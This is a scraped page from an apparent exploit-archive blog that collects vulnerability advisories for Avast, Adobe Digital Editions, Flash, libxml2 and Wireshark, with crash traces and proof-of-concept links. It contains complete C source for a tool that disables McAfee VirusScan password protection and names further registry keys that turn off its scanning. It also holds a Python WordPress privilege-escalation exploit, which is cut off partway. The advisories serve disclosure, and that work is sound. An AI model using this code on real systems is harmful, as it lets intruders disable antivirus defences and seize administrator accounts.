Source: https://code.google.com/p/google-security-research/issues/detail?id=668
The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing.
(474.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x7dd4:
740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=????????
0:080> ub
aswCmnBS_74080000!StreamHashClose+0x7dc5:
740b4445 55 push ebp
740b4446 56 push esi
740b4447 57 push edi
740b4448 33ff xor edi,edi
740b444a 8be9 mov ebp,ecx
740b444c 85db test ebx,ebx
740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497)
740b4450 8b742418 mov esi,dword ptr [esp+18h]
0:080> dd esp+18 L1
10cedfc0 30303030
# It looks like this address was a parameter, lets skip up a frame and see where it comes from
0:080> kvn 3
# ChildEBP RetAddr Args to Child..............
WARNING: Stack unwind information not available. Following frames may be wrong.
00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4
01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be
02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
0:080> .frame /c 1
01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!StreamHashClose+0x81be:
740b483e 8bf8 mov edi,eax
0:080> ub.
aswCmnBS_74080000!StreamHashClose+0x81aa:
740b482a 0000 add byte ptr [eax],al
740b482c 0001 add byte ptr [ecx],al
740b482e 0000 add byte ptr [eax],al
740b4830 00ff add bh,bh
740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878)
740b4834 8bce mov ecx,esi
740b4836 ff7040 push dword ptr [eax+40h]
740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440)
# The parameter comes from eax+40:
0:080> dd eax+40 L1
128be3a4 30303030
# What is that address?
0:080> !address @eax
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 128b8000
End Address: 128ea000
Region Size: 00032000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 12150000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x120000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x128be364
# It's a heap buffer, is it valid?
0:080> !heap -x 0x128be364
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy.
# Looks okay to me, where does that buffer come from?
0:080> .frame /c 2
02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7
eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000
eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7:
740c37e7 83c40c add esp,0Ch
0:080> ub
aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3:
740c37d3 0000 add byte ptr [eax],al
740c37d5 0000 add byte ptr [eax],al
740c37d7 8b464c mov eax,dword ptr [esi+4Ch]
740c37da 57 push edi
740c37db 0345e8 add eax,dword ptr [ebp-18h]
740c37de 50 push eax
740c37df ff7510 push dword ptr [ebp+10h]
740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72)
0:080> dd ebp-18 L1
128be34c 57d9ddea
That is a really strange offset! And that DWORD appears in the input file at offset 316b3h:
│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|...
│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|...
│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|...
This looks like broken authenticode parsing to me.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39530.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863130975
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
########################################################################################
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
########################################################################################
===================
Introduction:
===================
Adobe® Digital Editions software offers an engaging way to view and manage eBooks and
other digital publications. Use it to download and purchase digital content, which can
be read both online and offline. Transfer copy-protected eBooks from your personal
computer to other computers or devices. Organize your eBooks into a custom library and
annotate pages. Digital Editions also supports industry-standard eBook formats,
including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)
########################################################################################
===================
Report Timeline:
===================
2015-10-24: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT.
2016-03-08: Vendor fixed the issue (APSB16-06).
2016-03-08: Release of this advisory.
########################################################################################
===================
Technical details:
===================
A critical memory corruption occurs when Adobe Digital Editions handle a specially
crafted ExtGstate object, which could lead to remote code execution.
########################################################################################
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip
########################################################################################
/*
Security Advisory @ Mediaservice.net Srl
(#01, 13/04/2016) Data Security Division
Title: McAfee VirusScan Enterprise security restrictions bypass
Application: McAfee VirusScan Enterprise 8.8 and prior versions
Platform: Microsoft Windows
Description: A local Windows administrator is able to bypass the
security restrictions and disable the antivirus engine
without knowing the correct management password
Author: Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: Fixed
References: http://lab.mediaservice.net/advisory/2016-01-mcafee.txt
http://lab.mediaservice.net/code/mcafee_unprotector.c
1. Abstract.
McAfee VirusScan Enterprise has a feature to protect the scan engine
from local Windows administrators. A management password is needed to
disable it, unless Windows is running in "Safe Mode".
>From our understanding this feature is implemented insecurely: the
McAfee VirusScan Console checks the password and requests the engine to
unlock the safe registry keys. No checks are done by the engine itself,
so anyone can directly request the engine to stop without knowing the
correct management password.
2. Example Attack Session.
The attack can be reproduced in different ways, here are some examples.
Example 1:
Open the McAfee VirusScan Console and Sysinternals Process Explorer.
Under Process Explorer:
- Locate the mcconsol.exe process
- Type CTRL+L (show lower pane)
- Search for all "HKLM\SOFTWARE\McAfee\DesktopProtection" keys
- Close all the handles of this registry key
Go back to the McAfee Console and:
- Go to: Tools -> General Options
- Select the "Password Options" tab
- Select "No password" and apply settings
Now it is possible to stop the antivirus engine.
Example 2:
A specific tool has been written to request to disable password
protection. After running the tool you can disable it via the VirusScan
Console.
Code: http://lab.mediaservice.net/code/mcafee_unprotector.c
3. Affected Platforms.
All McAfee Viruscan Enterprise versions prior to 8.8 without SB10151 are
affected. Exploitation of this vulnerability requires that an attacker
has local Windows administrator privileges.
4. Fix.
On 25 February 2016, version SB10151 hotfix has been relased by McAfee,
which fixes the described vulnerability.
https://kc.mcafee.com/corporate/index?page=content&id=SB10151
5. Proof Of Concept.
See Example Attack Session above.
6. Timeline
07/11/2014 - First communication sent to McAfee
17/11/2014 - Second communication sent to McAfee
17/11/2014 - McAfee: Request to send again vulnerability information
18/11/2014 - Sent vulnerability information and PoC again
11/12/2014 - McAfee: Problem confirmed
09/03/2015 - Request for update to McAfee
06/05/2015 - Request for update to McAfee
06/05/2015 - McAfee: Patch release planned for Q3
20/08/2015 - McAfee: Request for deadline delay (31/03/2016)
25/02/2016 - McAfee: SB10151 patch has been relased
Copyright (c) 2014-2016 @ Mediaservice.net Srl. All rights reserved.
--
Maurizio Agazzini CISSP, CSSLP, OPST
Senior Security Advisor
@ Mediaservice.net Srl Tel: +39-011-32.72.100
Via Santorelli, 15 Fax: +39-011-32.46.497
10095 Grugliasco (TO) ITALY http://mediaservice.net/disclaimer
"C programmers never die. They are just cast into void"
*/
/*****************************************************************************
* *
* McAfee Data Protector "Unprotector" *
* *
* A little tool to request McAfee scan engine to disable password *
* protection. *
* *
* Advisory: http://lab.mediaservice.net/advisory/2014-01-mcafee.txt *
* *
* This program can be compiled with MinGW (http://www.mingw.org/) *
* *
* Copyright (c) 2014 @ Mediaservice.net Srl. All rights reserved *
* Wrote by Maurizio Agazzini <inode[at]mediaservice.net> *
* *
* This program is free software; you can redistribute it and/or *
* modify it under the terms of the GNU General Public License *
* as published by the Free Software Foundation; either version 2 *
* of the License, or (at your option) any later version. *
* *
* This program is distributed in the hope that it will be useful, *
* but WITHOUT ANY WARRANTY; without even the implied warranty of *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
* GNU General Public License for more details. *
* *
* You should have received a copy of the GNU General Public License *
* along with this program; if not, write to the Free Software *
* Foundation, Inc., 59 Temple Place *
* Suite 330, Boston, MA 02111-1307, USA. *
* *
*****************************************************************************/
#include <stdio.h>
#include <windows.h>
HANDLE opendevice()
{
HANDLE result;
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
if((result = CreateFile("\\\\.\\Global\\WGUARDNT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL) ) == NULL)
result = 0;
return result;
}
void main(int argc, char ** argv)
{
HKEY reg_key = NULL;
HANDLE p;
DWORD BytesReturned;
DWORD data = 0;
unsigned long size = 4;
DWORD type = REG_DWORD;
DWORD data1 = 0;
char status[4][70]= {
"No password",
"Password protection for all items listed",
"Password protection for the selected items",
"Password protection for conformance to Common Criteria"
};
printf("\n *******************************************\n");
printf(" * McAfee Desktop Protection \"Unprotector\" *\n");
printf(" *******************************************\n\n");
/*
* The PoC use HKLM\SOFTWARE\McAfee\DesktopProtection\UIPMode registry key to
* disable the password protection, but you can also access to others useful
* keys.
*
* User Password
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIP
* HKLM\SOFTWARE\McAfee\DesktopProtection\UIPEx
*
* Buffer protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\BOPEnabled
*
* Access protection
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\BehaviourBlocking\APEnabled
*
* On Access Scanner
* HKLM\SOFTWARE\McAfee\DesktopProtection\OASState
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\On Access Scanner\McShield\Configuration\OASEnabled
*
* Others
* HKLM\SOFTWARE\McAfee\SystemCore\VSCore\LockDownEnabled
*
*/
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS)
{
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\\Wow6432Node\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | 0x0200, ®_key) != ERROR_SUCCESS)
{
printf("Error opening registry key...\n");
return;
}
}
// Check current status of McAfee protection
RegQueryValueEx(reg_key,"UIPMode",NULL, &type,(BYTE *)&data,&size);
printf(" [+] Current UIPMode = %d (%s)\n\n", data, status[data]);
RegCloseKey (reg_key);
// Open McAfee magic device
p = opendevice();
printf(" [-] Please John, let me write to your registry keys...");
// Request to the scan engine to stop protect registry keys
DeviceIoControl(p, 0x9EDB6510u, 0, 0, 0, 0, &BytesReturned, 0);
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS)
if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, "SOFTWARE\\McAfee\\DesktopProtection", 0, KEY_QUERY_VALUE | KEY_READ | KEY_SET_VALUE, ®_key) != ERROR_SUCCESS)
{
printf(" hmmm hmmm something went wrong!\n\n");
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
return;
}
printf(" OK\n");
data1 = 0;
if( argc > 1 )
data1 = atoi(argv[1]);
// Disable McAfee protection
if( RegSetValueEx(reg_key, "UIPMode", 0, REG_DWORD, (CONST BYTE *)&data1, sizeof(DWORD)) != ERROR_SUCCESS)
printf("\n hmmm hmmm something went wrong!\n");
else
printf("\n [+] Thank you! now we got the control! UIPMode = %d\n",data1);
RegCloseKey (reg_key);
printf("\n [+] Run \"%s %d\" to get original settings\n\n",argv[0],data);
// Tell to engine to take control again
printf(" [-] Ok John, take the control again!\n");
DeviceIoControl(p, 0x9EDB6514u, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(p);
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=640
There is a type confusion vulnerability in the SimpleButton constructor. Flash stores an empty button to use to create buttons for optimization reasons. If this object is created using a SWF tag before it is created in the Button class, and it not of type Button, type confusion can occur.
A SWF needs to be altered in a hex editor to reproduce this issue. To start, build button.fla. This is a swf with the code:
var sb = new SimpleButton();
and a font attached. Decompress the swf using flasm -x button.swf, and then replace all occurrences of the font ID (0x0001) in the three tags that use it with the ID of the empty button object (0xfff6).
When the button is created, the font will be type confused with a button.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39476.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=638
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
--- cut ---
==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568
READ of size 1 at 0x6290000049e6 thread T0
#0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13
#1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
#2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5
#6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6
#7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12
#8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9
#9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17
#10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16
#11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
#14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
#15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
#16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
#17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
#18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
#19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2
Shadow bytes around the buggy address:
0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==4588==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39492.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=637
The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
--- cut ---
==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290
READ of size 73661 at 0x631000010810 thread T0
#0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5
#2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11
#3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12
#4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810)
allocated by thread T0 here:
#0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
#1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
#2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
#3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
#4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
#5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6
#6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
#7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
#8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
#9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
#10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
#11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
#12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
#13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
#14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==25920==ABORTING
--- cut ---
The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39491.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=647
The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
WRITE of size 1425 at 0x61b00001e95c thread T0
#0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
#2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
#3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
#4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
#5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
#6 0x52c1df in main wireshark/tshark.c:2197:13
0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5869==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39490.zip
"""
* Exploit Title: Extra User Details [Privilege Escalation]
* Discovery Date: 2016-02-13
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://vadimk.com/
* Software Link: https://wordpress.org/plugins/extra-user-details/
* Version: 0.4.2
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress
Description
-----------
_Extra User Details_ plugin for WordPress suffers from a Privilege
Escalation
vulnerability.
The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
WordPress action. This function doesn't properly check user capabilities
and
updates all meta information passed to post data. The only condition is
that
the post variable name has the `eud` prefix which is striped before
updating
the values in DB.
An attacker can exploit this misbehavior to update the
{prefix}\_capabilities
meta information to gain administrative privileges.
PoC
---
In the following PoC we assume that the database has the `wp` prefix, a
very
common scenario as this is the default WordPress value
"""
# !/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Panagiotis Vagenas <pan.vagenas>
#
# Dependencies: BeautifulSoup
(http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import requests
from bs4 import BeautifulSoup
baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'
loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
s = requests.Session()
r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
print('Login error')
exit(1)
r = s.get(profileUrl)
